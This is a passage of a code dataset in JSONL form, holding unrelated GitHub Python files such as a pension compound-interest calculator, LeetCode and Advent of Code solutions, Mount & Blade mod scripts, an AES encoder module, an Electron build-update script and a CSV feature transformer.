__init__(self, start_balance, month_invest, growth_percent, start_age):\n self.results = {0: (start_balance, start_age)}\n self.start_age = start_age\n month_growth = self._get_monthly_rate(growth_percent)\n month_inf = self._get_monthly_rate(INFLATION)\n month_charge = self._get_monthly_rate(CHARGE_PERCENT)\n\n for i in range(1, 300):\n cur_balance, cur_age = self.results[i - 1]\n new_balance = cur_balance * (1 + month_growth - month_charge - month_inf) + month_invest\n self.results[i] = (new_balance, cur_age + 1/12)\n\n def print_results(self):\n for k, v in self.results.items():\n pot, age = v\n print(str(k).ljust(4), str(round(age, 2)).ljust(6), str(round(pot, 2)))\n\n def final_balance(self, pension_age):\n print ('{} years old : final balance {}'.format(pension_age,\n int(self.results[int((pension_age - self.start_age) * 12)][0])))\n\n def _get_monthly_rate(self, annual_rate):\n return (1 + (annual_rate/100)) ** (1/12) - 1\n\nc = Compound(63500, 300, 8, 36 + 4/12)\nc.print_results()\nc.final_balance(60)\n# d = Drawdown(250000, 14300, 5)\n# d.print_results()\n# print(d.any_left(89))\n# print(d.any_left(90))\n\n\n# def get_income(pot, end_age):\n# income_result = [str(pot)]\n# for growth in range(2, 11):\n# for income in range(3000, 50000, 100):\n# m = Drawdown(pot, income, growth)\n# if not m.any_left(end_age):\n# income_result.append(str(income))\n# break\n# print('|'.join(income_result))\n# f.write('|'.join(income_result) + '\\n')\n#\n# with open('draw_down.txt', 'w+') as f:\n# for pot in range(100000, 500001, 10000):\n# get_income(pot, 90)\n\n\n\n\n\n","repo_name":"tomstagg/lab","sub_path":"finance/finance.py","file_name":"finance.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12202801525","text":"class Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n if not n or not k:\n return [[]]\n nums = [i for i in range(1, n+1)]\n ans = []\n self.helper(nums, 0, [], ans, k)\n return ans\n \n \n def helper(self, nums, idx, ss, ans, k):\n if len(ss) == k:\n ans.append(ss[:])\n return\n for i in range(idx, len(nums)):\n ss.append(nums[i])\n self.helper(nums, i + 1, ss, ans, k)\n ss.pop()\n return \n ","repo_name":"Jsonghh/leetcode","sub_path":"191217/Combinations.py","file_name":"Combinations.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23482888888","text":"#!/usr/bin/env python3.9\n\nfrom collections import defaultdict\n\n\ndef get_input() -> list[str]:\n with open(\"input.txt\", \"r\") as f:\n return f.read()\n\n\nDAYS = 256\n\n\ndef main():\n lanterns = list(map(int, get_input().split(\",\")))\n\n nums = defaultdict(int)\n for n in lanterns:\n if n not in nums:\n nums[n] = 0\n nums[n] += 1\n\n for d in range(DAYS):\n newnums = defaultdict(int)\n for n, cnt in nums.items():\n if n == 0:\n newnums[6] += cnt\n newnums[8] += cnt\n else:\n newnums[n - 1] += cnt\n nums = newnums\n\n print(sum(nums.values()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"luisiacc/advent-of-code-2021","sub_path":"day6/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"8456433263","text":"import numpy as np\nfrom scipy.spatial.transform import Rotation as R\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\n\ndef meshgrid_to_matrix(meshgrid):\n X, Y, Z = meshgrid\n return np.matrix([X.flatten(), Y.flatten(), Z.flatten()]).T\n\n\ndef matrix_to_meshgrid(matrix):\n num_points = int(np.sqrt(matrix.shape[0]))\n X = matrix[:, 0].reshape((num_points, num_points))\n Y = matrix[:, 1].reshape((num_points, num_points))\n Z = matrix[:, 2].reshape((num_points, num_points))\n return [X, Y, Z]\n\n\ndef create_cylinder(radius, height, resolution=10):\n phi = np.linspace(0, 2 * np.pi, resolution)\n z = np.linspace(-height/2, height/2, resolution)\n\n Phi, Z = np.meshgrid(phi, z)\n\n X = radius * np.cos(Phi)\n Y = radius * np.sin(Phi)\n\n return [X, Y, Z]\n\n\ndef plot_or_update_line(ax, xs, ys, zs, c=None, marker=None, line=None):\n if line:\n line.set_data(xs, ys)\n line.set_3d_properties(zs)\n return line\n else:\n l, = ax.plot(xs, ys, zs, c=c, marker=marker)\n return l\n\n\ndef plot_or_update_plane(ax, xs, ys, zs, c=None, line=None, alpha=None):\n if False and line:\n line.set_data(xs, ys)\n line.set_3d_properties(zs)\n return line\n else:\n l = ax.plot_surface(xs, ys, zs, color=c, alpha=alpha)\n return l\n\n\ndef draw_line(ax, start, end, c=\"r\", marker=\"\", line=None):\n xs, ys, zs = np.array([start, end]).T\n return plot_or_update_line(ax, xs, ys, zs, c=c, marker=marker, line=line)\n\n\ndef plot_axis(ax, lengths=[1, 1, 1]):\n x_length, y_length, z_length = lengths\n\n draw_line(ax, [-x_length, 0, 0], [x_length, 0, 0], c=\"r\", marker=\"o\"),\n draw_line(ax, [0, -y_length, 0], [0, y_length, 0], c=\"g\", marker=\"o\"),\n draw_line(ax, [0, 0, -z_length], [0, 0, z_length], c=\"b\", marker=\"o\"),\n\n\ndef rotate(matrix, rotation):\n r = R.from_euler('xyz', rotation)\n return matrix @ r.as_matrix()\n\n\ndef vec_length(vec):\n return np.sqrt(np.sum(np.square(vec)))\n\n\ndef draw_vector_cylinder(ax, vec, radius=0.1, line=None, r=[]):\n length = vec_length(vec)\n cylinder = meshgrid_to_matrix(create_cylinder(radius, length, 20))\n\n # Rotate cylinder to match vector\n x, y, z = r\n rotated = rotate(cylinder, [x, y, z])\n\n relocated = rotated # + vec\n\n return plot_or_update_plane(ax, *matrix_to_meshgrid(relocated), c=\"r\", alpha=0.5, line=line)\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nplt.subplots_adjust(left=0.25, bottom=0.25)\n\nrx = Slider(plt.axes([0.25, 0.1, 0.65, 0.03]), 'X', 0, np.pi, valinit=0)\nry = Slider(plt.axes([0.25, 0.15, 0.65, 0.03]), 'Y', 0, np.pi, valinit=0)\nrz = Slider(plt.axes([0.25, 0.30, 0.65, 0.03]), 'Z', 0, np.pi, valinit=0)\n\nla = None\nlb = None\n\ndef draw():\n global la, lb\n\n vec = np.array([1, 1, 1])/2\n\n plot_axis(ax, [3, 3, 3])\n la = draw_line(ax, [rx.val, ry.val, rz.val], vec, c=\"orange\", marker=\"o\")\n lb = draw_vector_cylinder(ax, vec, r=[rx.val, ry.val, rz.val])\n\ndef update(val):\n ax.cla()\n draw()\n fig.canvas.draw_idle()\n\nrx.on_changed(update)\nry.on_changed(update)\nrz.on_changed(update)\n\ndraw()\nplt.show()\n","repo_name":"nosknut/IELET2103-Robotikk","sub_path":"Simulations/matplotlib/rotate_cylinder_update_line.py","file_name":"rotate_cylinder_update_line.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35213769114","text":"#\n# @lc app=leetcode id=1163 lang=python3\n#\n# [1163] Last Substring in Lexicographical Order\n#\n# https://leetcode.com/problems/last-substring-in-lexicographical-order/description/\n#\n# algorithms\n# Hard (34.86%)\n# Likes: 216\n# Dislikes: 289\n# Total Accepted: 16.7K\n# Total Submissions: 47.7K\n# Testcase Example: '\"abab\"\\r'\n#\n# Given a string s, return the last substring of s in lexicographical\n# order.\n# \n# \n# \n# Example 1:\n# \n# \n# Input: \"abab\"\n# Output: \"bab\"\n# Explanation: The substrings are [\"a\", \"ab\", \"aba\", \"abab\", \"b\", \"ba\", \"bab\"].\n# The lexicographically maximum substring is \"bab\".\n# \n# \n# Example 2:\n# \n# \n# Input: \"leetcode\"\n# Output: \"tcode\"\n# \n# \n# \n# \n# Note:\n# \n# \n# 1 <= s.length <= 4 * 10^5\n# s contains only lowercase English letters.\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def lastSubstring(self, s: str) -> str:\n '''\n 首先最大字串肯定是最大后缀字串\n 即如果我们当前得到了最大字符,index是它在字符串s中的下标,我们当前的答案就是 s [ index : ]\n 设立左右两个指针,left记录当前遇见的最大字符,right负责往后遍历,寻找是否有更大的字符\n step负责的是:如果s[left] == s[right] 则继续比较 s [ left + i ]与 s [ right + i ] (i = 1,2,3,4,5......)的工作\n 直到我们找到了其中一个更大的或者我们遇见了边界 right+step == len(s), 否则step将一直增大\n 一旦找到了一个更大的,我们就把step还原回0\n '''\n s_len, left, right, step = len(s), 0, 1, 0\n while(right + step < s_len):\n if s[right + step] > s[left + step]:\n left, right, step = right , right+1, 0\n elif s[right + step] < s[left + step]:\n right, step = right+step+1, 0\n else:\n step += 1\n return s[left:]\n\n# @lc code=end\n\n","repo_name":"ck2w/Leetcode","sub_path":"py/1163.last-substring-in-lexicographical-order.py","file_name":"1163.last-substring-in-lexicographical-order.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71228059040","text":"#\n# @lc app=leetcode.cn id=381 lang=python3\n#\n# [381] O(1) 时间插入、删除和获取随机元素 - 允许重复\n#\n\n# @lc code=start\nimport collections\nfrom random import choice\n\n\nclass RandomizedCollection:\n\n def __init__(self):\n self.nums = []\n self.indexs = collections.defaultdict(lambda:set())\n\n\n def insert(self, val: int) -> bool:\n self.nums.append(val)\n self.indexs[val].add(len(self.nums) - 1)\n return len(self.indexs[val]) == 1\n\n\n def remove(self, val: int) -> bool:\n if val not in self.indexs:\n return False\n idx = list(self.indexs[val])[0]\n last = self.nums[-1]\n if idx == len(self.nums) - 1:\n self.indexs[val].remove(idx)\n if len(self.indexs[val]) == 0:\n del self.indexs[val]\n self.nums.pop()\n return True\n self.nums[idx] = last\n self.indexs[val].remove(idx)\n self.indexs[last].remove(len(self.nums) - 1)\n if idx < len(self.nums) - 1:\n self.indexs[last].add(idx)\n if len(self.indexs[val]) == 0:\n del self.indexs[val]\n self.nums.pop()\n return True\n\n\n def getRandom(self) -> int:\n return choice(self.nums)\n\n\n\n# Your RandomizedCollection object will be instantiated and called as such:\n# obj = RandomizedCollection()\n# param_1 = obj.insert(val)\n# param_2 = obj.remove(val)\n# param_3 = obj.getRandom()\n# @lc code=end\n\n","repo_name":"Jvaeyhcd/.leetcode","sub_path":"381.o-1-时间插入、删除��获取随机元素-允许重复.py","file_name":"381.o-1-时间插入、删除和获取随机元素-允许重复.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71307276318","text":"##===================================\n##File: dpc_dispatch.py\n##Author: Merrick Chang\n##Date: July 2019\n##===================================\n\n\nimport random\n\n\nclass DPCDispatch:\n \"\"\"\n Static methods related to the DPC-Dispatch algorithm from Planken (2013)\n \"\"\"\n\n @staticmethod\n def dpc_dispatch(stn, seq, min_window = -1000, max_window = 1000):\n \"\"\"\n DPC-Dispatch algorithm from Planken (2013)\n -------------------------------------------------------------------\n Input:\n stn, the target STN\n seq, an ordering for the vertices in the STN in the form of a list of ints\n min_window, a minimum time within which all the time points are executed\n max_window, a maximum time within which all the time points are executed\n\n Output:\n schedule, an list of ints representing the execution times\n -------------------------------------------------------------------\n \"\"\"\n time_windows = []\n neighboor_hoods = []\n schedule = []\n if not stn.predecessor_edges or not stn.pred_edges_up_to_date:\n stn.update_predecessors()\n for n in range(stn.length):\n time_windows.append([min_window, max_window])\n schedule.append(float(\"inf\"))\n neighbors = set(stn.successor_edges[n].keys())\n neighbors.update(stn.predecessor_edges[n].keys())\n neighboor_hoods.append(neighbors)\n for k, v in enumerate(seq):\n min_time, max_time = time_windows[v]\n try:\n schedule[v] = random.randint(min_time, max_time)\n except ValueError:\n print(\"Error: Min-Time Exceeds Max-Time... The Max-Window Is Likely Too Low\")\n return False\n for neighbor in neighboor_hoods[v]:\n if seq.index(neighbor) > k:\n if neighbor in stn.predecessor_edges[v]:\n alt_min = schedule[v] - stn.predecessor_edges[v][neighbor]\n if time_windows[neighbor][0] < alt_min:\n time_windows[neighbor][0] = alt_min\n if neighbor in stn.successor_edges[v]:\n alt_max = stn.successor_edges[v][neighbor] + schedule[v]\n if time_windows[neighbor][1] > alt_max:\n time_windows[neighbor][1] = alt_max\n return schedule\n","repo_name":"MerrickChang/URSI-2020","sub_path":"src/algorithms/path_consist/dpc_dispatch.py","file_name":"dpc_dispatch.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23580358390","text":"from PIL import Image, ImageDraw, ImageFont\n\n# Create a new image with black background\nimg = Image.new('RGB', (1200, 630), color = 'black')\n\n# Load the fonts (adjust the paths and sizes as needed)\nfont1 = ImageFont.truetype('Ubuntu-Regular.ttf', 70)\nfont2 = ImageFont.truetype('Ubuntu-BoldItalic.ttf', 100)\n\nd = ImageDraw.Draw(img)\n\n# Convert hex color to RGB\ncolor = (115, 193, 252)\n\n# Add text to the image\nd.text((80,60), \"Julian Lopez Presents\", font=font1, fill=color)\nd.text((img.width//2, img.height//2), \"Domain of a Knight\", font=font2, fill=color, anchor='mm')\n\n# Save the image\nimg.save('output.png')\n","repo_name":"JLO64/JLO64.github.io","sub_path":"scripts/opengraph-images.py","file_name":"opengraph-images.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"851415860","text":"from header import *\n\n#script_update_manor_array\n\t# WARNING: this is totally new procedure (not present in native). 1257AD devs\n\t#input: none\n\t#output: none\n\t#updates the trp_manor_array troop, which is the storage troop for manor id\nupdate_manor_array = (\n\t\"update_manor_array\",\n\t[\n\t\t\t (assign, \":slot_nr\", 1),\n\t\t (try_for_parties, \":party_id\"),\n\t\t\t (party_get_template_id,\":party_template\",\":party_id\"),\n\t\t (eq, \":party_template\", \"pt_manor\"),\n\t\t (troop_set_slot,\"trp_manor_array\",\":slot_nr\",\":party_id\"),\n\t\t (val_add, \":slot_nr\", 1),\t\t\n\t\t \n\t\t (party_get_slot, \":center\", \":party_id\", slot_village_bound_center), #get the village of the manor\n\t\t (party_set_slot,\":center\",village_slot_manor,\":party_id\"), #save the manor to the village\n\t\t #assign scenes\n\t\t (call_script, \"script_manor_set_unique_scene\", \":party_id\", \":center\"),\n\t\t (try_end), #cycle\n\t\t (troop_set_slot,\"trp_manor_array\",0,\":slot_nr\"), #zero hold the total amount of parties\n\t])\n\n\t\n\t#script_prepare_manor_troops\n\t#input:none\n\t#output:none\n\t#description: this will set the goods of the manor craftsman\nprepare_manor_troops = (\n\t\"prepare_manor_troops\",\n\t[\n\t\t(troop_set_slot,\"trp_manor_grain\", manor_troop_slot_good, itm_grain),\n\t\t(troop_set_slot,\"trp_manor_livestock\", manor_troop_slot_good, itm_wool),\n\t\t(troop_set_slot,\"trp_manor_fruit\", manor_troop_slot_good, itm_apples),\n\t\t(troop_set_slot,\"trp_manor_fisher\", manor_troop_slot_good, itm_smoked_fish),\n\t\t(troop_set_slot,\"trp_manor_baker\", manor_troop_slot_good, itm_bread),\n\t\t(troop_set_slot,\"trp_manor_winer\", manor_troop_slot_good, itm_wine),\n\t\t(troop_set_slot,\"trp_manor_brewer\", manor_troop_slot_good, itm_ale),\n\t\t(troop_set_slot,\"trp_manor_potter\", manor_troop_slot_good, itm_pottery),\n\t\t(troop_set_slot,\"trp_manor_blacksmith\", manor_troop_slot_good, itm_tools),\n\t\t(troop_set_slot,\"trp_manor_butcher\", manor_troop_slot_good, itm_dried_meat),\n\t\t(troop_set_slot,\"trp_manor_oilmaker\", manor_troop_slot_good, itm_oil),\n\t\t(troop_set_slot,\"trp_manor_linen\", manor_troop_slot_good, itm_linen),\n\t\t(troop_set_slot,\"trp_manor_wool\", manor_troop_slot_good, itm_wool_cloth),\n\t\t(troop_set_slot,\"trp_manor_tanner\", manor_troop_slot_good, itm_leatherwork),\t\n\t\t \n\t\t(troop_set_slot,\"trp_manor_trader_silk\", manor_troop_slot_good, itm_raw_silk),\n\t\t(troop_set_slot,\"trp_manor_trader_spice\", manor_troop_slot_good, itm_spice),\n\t\t(troop_set_slot,\"trp_manor_trader_dyes\", manor_troop_slot_good, itm_raw_dyes),\n\t\t(troop_set_slot,\"trp_manor_trader_salt\", manor_troop_slot_good, itm_salt),\n\t\t \n\t\t(troop_set_slot,\"trp_manor_grain\", manor_troop_slot_tax, manor_slot_tax_grainfarm),\n\t\t(troop_set_slot,\"trp_manor_livestock\", manor_troop_slot_tax, manor_slot_tax_livestock),\n\t\t(troop_set_slot,\"trp_manor_fruit\", manor_troop_slot_tax, manor_slot_tax_fruitfarm),\n\t\t(troop_set_slot,\"trp_manor_fisher\", manor_troop_slot_tax, manor_slot_tax_fisher),\n\t\t(troop_set_slot,\"trp_manor_baker\", manor_troop_slot_tax, manor_slot_tax_bakery),\n\t\t(troop_set_slot,\"trp_manor_winer\", manor_troop_slot_tax, manor_slot_tax_winery),\n\t\t(troop_set_slot,\"trp_manor_brewer\", manor_troop_slot_tax, manor_slot_tax_brewery),\n\t\t(troop_set_slot,\"trp_manor_potter\", manor_troop_slot_tax, manor_slot_tax_potter),\n\t\t(troop_set_slot,\"trp_manor_blacksmith\", manor_troop_slot_tax, manor_slot_tax_blacksmith),\n\t\t(troop_set_slot,\"trp_manor_butcher\", manor_troop_slot_tax, manor_slot_tax_butcher),\n\t\t(troop_set_slot,\"trp_manor_oilmaker\", manor_troop_slot_tax, manor_slot_tax_oilmaker),\n\t\t(troop_set_slot,\"trp_manor_linen\", manor_troop_slot_tax, manor_slot_tax_linenworkshop),\n\t\t(troop_set_slot,\"trp_manor_wool\", manor_troop_slot_tax, manor_slot_tax_woolworkshop),\n\t\t(troop_set_slot,\"trp_manor_tanner\", manor_troop_slot_tax, manor_slot_tax_tannery),\t\n\t])\n\t\n\t#script_spawn_manors - tom made\n\t# WARNING: this is totally new procedure (not present in native). 1257AD devs\n\t# INPUT: none\n\t# OUTPUT: none\n\t# DESCRIPTION: Spawns random manor type to villages, castles and towns\nspawn_manors = (\n\t\"spawn_manors\",\n\t[ \n\t\t(try_for_range, \":center\", centers_begin, centers_end),\n\t\t\t(neg|is_between, \":center\", castles_begin, castles_end),\n\t\t\t(store_faction_of_party, \":center_faction\", \":center\"),\n\t\t(is_between, \":center_faction\", kingdoms_begin, kingdoms_end),\n\t\t(store_random_in_range, \":random\", 0, 100),\n\t\t(lt, \":random\", 50),\n\t\t(call_script, \"script_spawn_manor_party\", \"pt_manor\", \":center\"),\n\t\t(try_end),\n\t\t\n\t\t(call_script, \"script_update_manor_array\"),\n\t])\n\t\n\t#script_spawn_manor_party - tom made\n\t# WARNING: this is totally new procedure (not present in native). 1257AD devs\n\t#input: party to spawn, center to bind to and spawn around it, bound and rename party(if 0 - not, only for manors).\n\t#output: reg0 - party id.\nspawn_manor_party = (\n\t\"spawn_manor_party\",\n\t[\n\t\t(store_script_param, \":random\", 1),\n\t\t(store_script_param, \":center\", 2),\n\t\t\n\t\t(set_spawn_radius, 7),\n\t\t(store_faction_of_party, \":center_faction\", \":center\"),\n\t\t(spawn_around_party, \":center\", \":random\"),\n\t\t(assign, \":party_id\", reg0),\n\t\t(try_begin), #this can fail?\n\t\t\t(party_get_position, pos0, \":center\"),\n\t\t\t(map_get_land_position_around_position, pos1, pos0, 5),\n\t\t(try_end),\n\t\t\n\t\t(party_get_position, pos0, \":center\"),\n\t\t(assign, \":upper_bound\", 3000),\n\t\t(try_for_range, reg1, 0, \":upper_bound\"),\n\t\t\t(map_get_land_position_around_position, pos1, pos0, 7),\n\t\t\t(assign, \":bad\", 0),\n\t\t\t(try_for_parties, \":parties\"),\n\t\t\t\t(this_or_next|is_between, \":parties\", centers_begin, centers_end),\n\t\t\t(eq, \":parties\", \"pt_manor\"),\n\t\t\t\t(party_get_position, pos2, \":parties\"),\n\t\t\t(get_distance_between_positions_in_meters, \":distance\", pos2, pos1),\n\t\t\t(try_begin),\n\t\t\t\t(lt, \":distance\", 1),\n\t\t\t\t(assign, \":bad\", 1),\n\t\t\t(try_end), \n\t\t\t(try_end),\n\t\t\t(try_begin),\n\t\t\t\t(eq, \":bad\", 0),\n\t\t\t\t(party_set_position,\":party_id\",pos1),\n\t\t\t(party_get_current_terrain, \":terrain\", \":party_id\"),\n\t\t\t(try_begin), #bridge/shore - means boo boo\n\t\t\t\t(eq, \":terrain\", rt_bridge),\n\t\t\t(else_try),\n\t\t\t\t(assign, \":upper_bound\", -8),\n\t\t\t(try_end),\n\t\t\t(try_end),\t\n\t\t(try_end),\n\t\t\n\t\t##spawn some random buildings in it\n\t\t(store_random_in_range, \":random\", 1, 5),\n\t\t(try_for_range, reg0, 0, \":random\"),\n\t\t\t(store_random_in_range, \":random_building\", manor_slot_marketplace, manor_slot_walls),\n\t\t\t(party_set_slot, \":party_id\", \":random_building\", manor_building_operational),\n\t\t(try_end),\n\t\t\n\t\t##add some random stats\n\t\t(try_begin),\n\t\t\t(store_random_in_range, \":population\", 10, 50),\n\t\t\t(store_random_in_range, \":prosperity\", 1, 10),\n\t\t\t(party_set_slot, \":party_id\", manor_slot_population, \":population\"),\n\t\t\t(party_set_slot, \":party_id\", slot_town_prosperity, \":prosperity\"),\n\t\t(try_end),\n\t\t\n\t\t#(party_set_position,\":party_id\",pos1),\n\t\t(party_set_faction,\":party_id\", \":center_faction\"),\n\t\t(party_set_slot, \":party_id\", slot_village_bound_center, \":center\"),\n\t\t(str_store_party_name, s0, \":center\"),\n\t\t(str_store_party_name, s1, \":party_id\"),\n\t\t(str_store_string, s2, \"@{s1} of {s0}\"),\n\t\t(party_set_name, \":party_id\", s2),\n\t\t(assign, reg0, \":party_id\"),\n\t])\n\n#script_update_manor_infested_by_bandits\n\t# WARNING: this is totally new procedure (not present in native). 1257AD devs\n\t#input: none\n\t#output: none\n\t#description: updates the manors with possible crysis. Called from triggers\n\t#0 - none\n\t#1 - regular bandits\n\t#2 - mercenery band rampaging\n\t#3 - two nobles conflicting\n\t#4 - angry peasents are angry for some reason\n\t#5 - \nupdate_manor_infested_by_bandits = (\n\t\"update_manor_infested_by_bandits\",\n\t [\n\t\t#0 - none\n\t\t#1 - regular bandits\n\t\t#2 - mercenery band rampaging\n\t\t#3 - two nobles conflicting\n\t\t#4 - angry peasents are angry for some reason\n\t\t#5 - \n\t\t(troop_get_slot,\":manor_amount\",\"trp_manor_array\",0),\n\t\t(try_for_range, \":slot\", 1, \":manor_amount\"),\n\t\t\t(troop_get_slot,\":manor\",\"trp_manor_array\",\":slot\"),\n\t\t(party_clear, \":manor\"),\n\t\t(party_set_slot, \":manor\", slot_village_state, svs_normal),\n\t\t(store_random_in_range, \":random\", 0, 100),\n\t\t(party_clear_particle_systems, \":manor\"),\n\t\t#manors with walls does not get infested(unique manors that is)\n\t\t(try_begin),\n\t\t\t(party_slot_eq, \":manor\", manor_slot_walls, manor_building_operational),\n\t\t\t(assign, \":random\", 0), #not infested\n\t\t(try_end),\n\t\t(try_begin), #monastery does not get infested\n\t\t\t(party_get_template_id, \":manor_template\", \":manor\"),\n\t\t\t(eq, \":manor_template\", \"pt_monastery\"),\n\t\t\t(assign, \":random\", 0), #not infested\n\t\t(try_end),\n\t\t\n\t\t#note manor bandits work diffrently from villages. We store id of the crysis, insted of the troop infesting it.\n\t\t\n\t\t(try_begin),\n\t\t\t(lt, \":random\", 80), \n\t\t\t(party_set_slot,\":manor\",slot_village_infested_by_bandits, 0),\n\t\t\t(party_clear_particle_systems, \":manor\"),\n\t\t(else_try),\n\t\t\t(store_random_in_range, \":random\", 1, 3),\n\t\t\t(party_set_slot,\":manor\",slot_village_infested_by_bandits,\":random\"),\n\t\t\t#(party_add_particle_system, \":manor\", \"psys_map_village_fire\"),\n\t\t\t\t\t(party_add_particle_system, \":manor\", \"psys_map_village_fire_smoke\"),\n\t\t\t(try_end),\n\t\t(try_end),\n\t ])","repo_name":"admiralnelson/modded_modded_1257ad","sub_path":"script/procedures/AD1257_manor_system.py","file_name":"AD1257_manor_system.py","file_ext":"py","file_size_in_byte":8880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73706969118","text":"from sneakers.modules import Encoder, Parameter\n\nimport scrypt\nimport base64\n\n# note that the class name *must* be title cased\nclass Aes(Encoder):\n description = \"\"\"\\\n Encrypts data using AES and the provided encryption key. The resulting bits are then base64 encoded to allow them to be represented as text.\n \"\"\"\n\n params = {\n 'sending': [\n Parameter('key', True, 'String used as encryption key.')\n ],\n 'receiving': [\n Parameter('key', True, 'String used as encryption key.')\n ]\n }\n\n def encode(self, data):\n key = self.param('sending', 'key')\n en = scrypt.encrypt(data, key.encode('ascii'), 0.1)\n return base64.b64encode(en)\n\n def decode(self, data):\n key = self.param('sending', 'key')\n de = base64.b64decode(data)\n return scrypt.decrypt(de, key.encode('ascii'))\n\n","repo_name":"DakotaNelson/sneaky-creeper","sub_path":"sneakers/encoders/aes.py","file_name":"aes.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"51"} +{"seq_id":"17611057363","text":"#!/usr/bin/env python\n\nimport os\nimport platform\nimport subprocess\nimport sys\n\nfrom lib.config import get_target_arch\n\n\nSOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\ndef main():\n os.chdir(SOURCE_ROOT)\n\n update_external_binaries()\n return update_gyp()\n\n\ndef update_external_binaries():\n uf = os.path.join('script', 'update-external-binaries.py')\n subprocess.check_call([sys.executable, uf])\n\n\ndef update_gyp():\n # Since gyp doesn't support specify link_settings for each configuration,\n # we are not able to link to different libraries in \"Debug\" and \"Release\"\n # configurations.\n # In order to work around this, we decided to generate the configuration\n # for twice, one is to generate \"Debug\" config, the other one to generate\n # the \"Release\" config. And the settings are controlled by the variable\n # \"libchromiumcontent_component\" which is defined before running gyp.\n target_arch = get_target_arch()\n return (run_gyp(target_arch, 0) or run_gyp(target_arch, 1))\n\n\ndef run_gyp(target_arch, component):\n python = sys.executable\n if sys.platform == 'cygwin':\n # Force using win32 python on cygwin.\n python = os.path.join('vendor', 'python_26', 'python.exe')\n gyp = os.path.join('vendor', 'brightray', 'vendor', 'gyp', 'gyp_main.py')\n defines = [\n '-Dlibchromiumcontent_component={0}'.format(component),\n '-Dtarget_arch={0}'.format(target_arch),\n '-Dhost_arch={0}'.format(target_arch),\n '-Dlibrary=static_library',\n ]\n return subprocess.call([python, gyp, '-f', 'ninja', '--depth', '.',\n 'atom.gyp', '-Icommon.gypi'] + defines)\n\n\ndef get_host_arch():\n if platform.architecture()[0] == '32bit':\n return 'ia32'\n else:\n return 'x64'\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"rsvip/electron","sub_path":"script/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36432045862","text":"from django.utils.six import wraps\nfrom django.http.response import HttpResponseForbidden\n\n\ndef requires_authentication(view):\n '''\n This decorator is used to decorate api views in order to make sure\n that only authenticated users can use the api. Unauthorized of anonymous\n users will receive an HTTP 403 FORBIDDEN response.\n '''\n @wraps(view)\n def wrapper(request, *args, **kwargs):\n if request.user.is_authenticated:\n result = view(request, *args, **kwargs)\n return result\n return HttpResponseForbidden()\n return wrapper\n\n\n# end of file\n","repo_name":"rabihkodeih/britecoretest","sub_path":"main/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42871157963","text":"import csv\n\ntrain = open(r'asm_train.csv')\ntest = open(r'asm_test.csv')\n\nfeatures = ['dd', 'dw', 'db', 'align', 'push', 'mov', 'add', 'xor', 'cmp',\n 'jnz', 'or', 'jz', 'lea', 'test', 'pop', 'leave', 'retn', 'endp',\n 'call', 'inc', 'movzx', 'setnle', 'jmp']\nfeatures2 = [feat+'r' for feat in features]\n\nrows = []\nrows2 = []\nfor t, row in enumerate(train):\n row = row.strip().split(',')\n rows.append(row)\n \nfor t, row in enumerate(test):\n row = row.strip().split(',')\n rows2.append(row)\n\nfor k, row in enumerate(rows):\n if k == 0:\n row.extend(features2)\n if k >= 1:\n Id = row[0]\n Class = row[1]\n values = row[2:]\n summation = 0\n newRow = row[:]\n for i in values:\n summation += int(i)\n if summation == 0:\n row.extend([0] * (len(row) - 2))\n continue\n for t, j in enumerate(row):\n if t >= 2:\n newRow.append(float(j) / summation)\n rows[k] = newRow[:]\n\nfor k, row in enumerate(rows2):\n if k == 0:\n row.extend(features2)\n if k >= 1:\n Id = row[0]\n values = row[1:]\n summation = 0\n newRow = row[:]\n for i in values:\n summation += int(i)\n if summation == 0:\n row.extend([0] * (len(row) - 1))\n continue\n for t, j in enumerate(row):\n if t >= 1:\n newRow.append(float(j) / summation)\n rows2[k] = newRow[:]\n\npredictions_file = open(\"asm_tran_train.csv\", \"wb\")\nopen_file_object = csv.writer(predictions_file)\nopen_file_object.writerows(rows)\npredictions_file.close()\n\npredictions_file = open(\"asm_tran_test.csv\", \"wb\")\nopen_file_object = csv.writer(predictions_file)\nopen_file_object.writerows(rows2)\npredictions_file.close()\n","repo_name":"raman-sharma/Kaggle_Competitions","sub_path":"MalwareClassification/asm_transform.py","file_name":"asm_transform.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72526911839","text":"import json\nimport 